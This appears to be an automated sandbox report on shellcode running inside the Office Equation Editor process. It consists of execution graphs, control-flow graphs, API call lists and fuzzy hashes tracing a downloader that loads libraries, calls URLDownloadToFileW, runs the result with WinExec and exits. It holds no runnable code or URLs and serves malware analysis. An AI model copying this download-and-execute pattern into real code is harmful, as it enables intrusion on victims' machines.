          execution_graph 292 359051c GetPEB 293 359052a 292->293 337 359037e ExitProcess 354 3590397 337->354 339 359038a 348 35903ec 339->348 372 35903da 339->372 355 359039d 354->355 376 35903b3 355->376 357 35903a4 358 35903da 7 API calls 357->358 369 35903ec 357->369 360 35903c0 358->360 362 3590433 360->362 363 35903d4 360->363 361 35904c7 3 API calls 364 35904b3 361->364 365 35904aa 4 API calls 362->365 366 3590454 URLDownloadToFileW 362->366 392 3590414 363->392 368 359052a 364->368 370 35904f5 3 API calls 364->370 365->366 366->361 368->339 371 35904ed 370->371 373 35903dd 372->373 374 3590414 7 API calls 373->374 375 35903ec 374->375 377 35903b9 376->377 378 35903da 7 API calls 377->378 380 35903c0 377->380 378->380 382 3590433 380->382 383 35903d4 380->383 381 35904c7 3 API calls 386 35904b3 381->386 384 35904aa 4 API calls 382->384 387 3590454 URLDownloadToFileW 382->387 385 3590414 7 API calls 383->385 384->387 389 35903ec 385->389 388 359052a 386->388 390 35904f5 3 API calls 386->390 387->381 388->357 391 35904ed 390->391 393 3590416 392->393 394 3590429 7 API calls 393->394 395 359041b 394->395 294 3590414 295 3590416 294->295 298 3590429 LoadLibraryW 295->298 301 3590430 298->301 309 3590443 298->309 305 3590454 URLDownloadToFileW 301->305 323 35904aa URLDownloadToFileW 301->323 319 35904c7 305->319 310 3590446 309->310 311 35904aa 4 API calls 310->311 312 3590454 URLDownloadToFileW 311->312 314 35904c7 3 API calls 312->314 315 35904b3 314->315 316 359052a 315->316 329 35904f5 315->329 316->301 320 35904ca 319->320 321 35904f5 3 API calls 320->321 322 35904ed 321->322 324 35904c7 3 API calls 323->324 325 35904b3 323->325 324->325 326 359052a 325->326 327 35904f5 3 API calls 325->327 326->305 328 35904ed 327->328 330 35904f8 WinExec 329->330 335 3590515 330->335 332 3590509 333 3590518 ExitProcess 332->333 334 35904ed 332->334 336 3590518 ExitProcess 335->336

          Callgraph

          • Executed
          • Not Executed
          • Opacity -> Relevance
          • Disassembly available
          callgraph 0 Function_035903DA 11 Function_03590414 0->11 1 Function_0359011D 2 Function_0359051C 20 Function_03590544 2->20 3 Function_035901FC 4 Function_035902BC 5 Function_0359037E 5->0 8 Function_035904F5 5->8 5->11 12 Function_03590397 5->12 14 Function_035904AA 5->14 5->20 21 Function_035904C7 5->21 6 Function_03590193 7 Function_035903B3 7->0 7->8 10 Function_03590595 7->10 7->11 7->14 7->20 7->21 9 Function_03590515 8->9 13 Function_03590429 11->13 12->0 12->7 12->8 12->10 12->11 12->14 12->20 12->21 13->8 13->14 17 Function_03590443 13->17 13->20 13->21 14->8 14->20 14->21 15 Function_0359008A 16 Function_03590000 17->8 17->14 17->20 17->21 18 Function_035900E3 19 Function_035902E2 21->8

          Control-flow Graph

          APIs
          • LoadLibraryW.KERNEL32(0359041B), ref: 03590429
            • Part of subcall function 03590443: URLDownloadToFileW.URLMON(00000000,03590454,7EE31250,00000000,00000000), ref: 035904AC
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFileLibraryLoad
          • String ID:
          • API String ID: 2776762486-0
          • Opcode ID: a48d4ee3cdb9ff31d51c56c885b5c55a692fffd37baf7728c5e5cb733b4e8e7a
          • Instruction ID: adaf44372fd997c320c24ee02804d5f679d79af6cc7618af6e25792c20349b1a
          • Opcode Fuzzy Hash: a48d4ee3cdb9ff31d51c56c885b5c55a692fffd37baf7728c5e5cb733b4e8e7a
          • Instruction Fuzzy Hash: 8D2191A150C3C16FEB12D7309D2AB65BF647B53614F09CACFD1890B0E3E3A49205C756

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 29 35904f5-359050a WinExec call 3590515 33 359050c 29->33 34 3590575-3590579 29->34 37 359055e 33->37 38 359050e 33->38 35 359057b 34->35 36 359057d 34->36 39 359057f-3590581 35->39 36->39 41 3590583-359058c 36->41 42 3590560-3590564 37->42 43 3590566-359056a 37->43 38->39 40 3590510-359051a ExitProcess 38->40 44 3590591-3590592 39->44 49 359058e 41->49 50 3590555-3590558 41->50 42->43 47 3590572 42->47 43->39 48 359056c-3590570 43->48 47->34 48->39 48->47 49->44 50->41 52 359055a 50->52 52->37
          APIs
          • WinExec.KERNEL32(7EE3146C,00000001), ref: 03590502
            • Part of subcall function 03590515: ExitProcess.KERNELBASE(00000000), ref: 0359051A
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: ExecExitProcess
          • String ID:
          • API String ID: 4112423671-0
          • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
          • Instruction ID: d81d79ae2b2f4ce6dff5b7dfc2f456e1468436ffd2886664c1ab908d29384625
          • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
          • Instruction Fuzzy Hash: E0F0F4D9D0424262FF30F268E8947B6AB50FB51200FCC8C479C82870F9E468D1C3A71D

          Control-flow Graph

          APIs
          • URLDownloadToFileW.URLMON(00000000,03590454,7EE31250,00000000,00000000), ref: 035904AC
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFile
          • String ID:
          • API String ID: 1407266417-0
          • Opcode ID: f895d158cb584884d59c8c9cfb243263b9d791bf8823fd634e3dd676ffe16dcc
          • Instruction ID: dc7baa79cdd25d5ddfde40adfcf1aa94bbc8c2578e47ae17865a0e07060f3fab
          • Opcode Fuzzy Hash: f895d158cb584884d59c8c9cfb243263b9d791bf8823fd634e3dd676ffe16dcc
          • Instruction Fuzzy Hash: 4A41AD6540C3C1AFEB12D730AE6AA65BF647B53600B0DCACFD1994B0F3E7649205C356

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 102 35903b3-35903b9 call 3590595 105 35903c0-35903c1 102->105 106 35903bb call 35903da 102->106 107 3590433-3590435 105->107 108 35903c3-35903c8 105->108 106->105 109 35904a5 107->109 110 3590437-359043a 107->110 108->107 111 35903ca 108->111 112 35904a6-35904be URLDownloadToFileW call 35904c7 109->112 113 359043b-359043e 110->113 111->113 114 35903cc-35903d2 111->114 122 359052c-3590534 call 3590544 112->122 123 35904c0 112->123 117 3590446-35904a4 call 35904aa 113->117 114->117 118 35903d4-3590427 call 3590414 114->118 117->112 132 3590539-359053b 122->132 126 359052b 123->126 127 35904c2-35904c3 123->127 126->122 127->132 133 35904c5-35904ee call 35904f5 127->133 136 359052a 132->136 137 359053d-3590541 132->137 136->122
          APIs
          • URLDownloadToFileW.URLMON(00000000,03590454,7EE31250,00000000,00000000), ref: 035904AC
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFile
          • String ID:
          • API String ID: 1407266417-0
          • Opcode ID: afe452786020432ad778f39173cc71332d1b02408995595cf39e72fac48905e5
          • Instruction ID: 10b80df6443dbd10787d8bc06be748e8a6f748bf569b62f45d60a45b3959c9df
          • Opcode Fuzzy Hash: afe452786020432ad778f39173cc71332d1b02408995595cf39e72fac48905e5
          • Instruction Fuzzy Hash: 6441AFA540C3C1AFEB12D730AE6AA55BF647B53610F0DCACFD1994B0F3E7A4A2058252

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 145 3590443-35904ae call 35904aa URLDownloadToFileW call 35904c7 155 35904b3-35904be 145->155 156 359052c-3590534 call 3590544 155->156 157 35904c0 155->157 161 3590539-359053b 156->161 158 359052b 157->158 159 35904c2-35904c3 157->159 158->156 159->161 162 35904c5-35904ee call 35904f5 159->162 163 359052a 161->163 164 359053d-3590541 161->164 163->156
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFile
          • String ID:
          • API String ID: 1407266417-0
          • Opcode ID: 12756a7d0f32402a599ce3138d868cea95867459ef864bb16ba7683243a025d0
          • Instruction ID: 14a6d1dcde919c85f482cdd023095fa805dd1505df282064a9fd914377d89c46
          • Opcode Fuzzy Hash: 12756a7d0f32402a599ce3138d868cea95867459ef864bb16ba7683243a025d0
          • Instruction Fuzzy Hash: 4C215EA190C3C1AFEB12D7709C6AB65BF647B52614F19CACFD1990F0E3E3A49101C752

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 168 35904aa-35904ac URLDownloadToFileW 169 35904b3-35904be 168->169 170 35904ae call 35904c7 168->170 171 359052c-3590534 call 3590544 169->171 172 35904c0 169->172 170->169 176 3590539-359053b 171->176 173 359052b 172->173 174 35904c2-35904c3 172->174 173->171 174->176 177 35904c5-35904ee call 35904f5 174->177 178 359052a 176->178 179 359053d-3590541 176->179 178->171
          APIs
          • URLDownloadToFileW.URLMON(00000000,03590454,7EE31250,00000000,00000000), ref: 035904AC
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadFile
          • String ID:
          • API String ID: 1407266417-0
          • Opcode ID: 4ae2f564089383c18a57d6d0227eed165ddc4348f56d3886efca049c67170671
          • Instruction ID: 224d02cc52003b4a08d21661c09730ec1c6c36468e5d58712cd01f2089f995c7
          • Opcode Fuzzy Hash: 4ae2f564089383c18a57d6d0227eed165ddc4348f56d3886efca049c67170671
          • Instruction Fuzzy Hash: 37114CF09043426AFF20E654E885BAAF7A1FFD2710F4CCD57E5504B0F5E2A0E5838619

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 183 3590515-359051a ExitProcess
          APIs
          • ExitProcess.KERNELBASE(00000000), ref: 0359051A
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
          • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
          • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
          • Instruction Fuzzy Hash:

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 185 359051c-3590527 GetPEB 186 359052a-359053b call 3590544 185->186 190 359053d-3590541 186->190
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
          • Instruction ID: 86700ddec748ea4d8b52bb63db11443b2c5e51e65751d99aeccb7e73fb7488e8
          • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
          • Instruction Fuzzy Hash: 18D05E712015028FD704DB04D940E52F37AFFC4310B14D665D0044B669D330EC92CA90

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 191 359037e-35903ad ExitProcess call 3590397 196 35903b0-35903c1 call 35903da 191->196 197 3590415-3590427 191->197 202 3590433-3590435 196->202 203 35903c3-35903c8 196->203 204 35904a5 202->204 205 3590437-359043a 202->205 203->202 206 35903ca 203->206 207 35904a6-35904be URLDownloadToFileW call 35904c7 204->207 208 359043b-359043e 205->208 206->208 209 35903cc-35903d2 206->209 217 359052c-3590534 call 3590544 207->217 218 35904c0 207->218 212 3590446-35904a4 call 35904aa 208->212 209->212 213 35903d4-3590413 call 3590414 209->213 212->207 213->197 227 3590539-359053b 217->227 221 359052b 218->221 222 35904c2-35904c3 218->222 221->217 222->227 228 35904c5-35904ee call 35904f5 222->228 231 359052a 227->231 232 359053d-3590541 227->232 231->217
          APIs
          • ExitProcess.KERNELBASE(0359036C), ref: 0359037E
          Memory Dump Source
          • Source File: 00000001.00000002.510902224.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_1_2_3590000_EQNEDT32.jbxd
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: b78841e3d6b7369770d488ec477ff2f2069d99e66ea98b9b7634404538a7dbbf
          • Instruction ID: f771604795d644362c6da4f8e295215e994ebaf2cfad630c04cd751df13b960f
          • Opcode Fuzzy Hash: b78841e3d6b7369770d488ec477ff2f2069d99e66ea98b9b7634404538a7dbbf
          • Instruction Fuzzy Hash: FD11DC6A80E7C59FEB02DB34BAAA155BF60B91310071C8DDBC19A4F1F3D2649606D392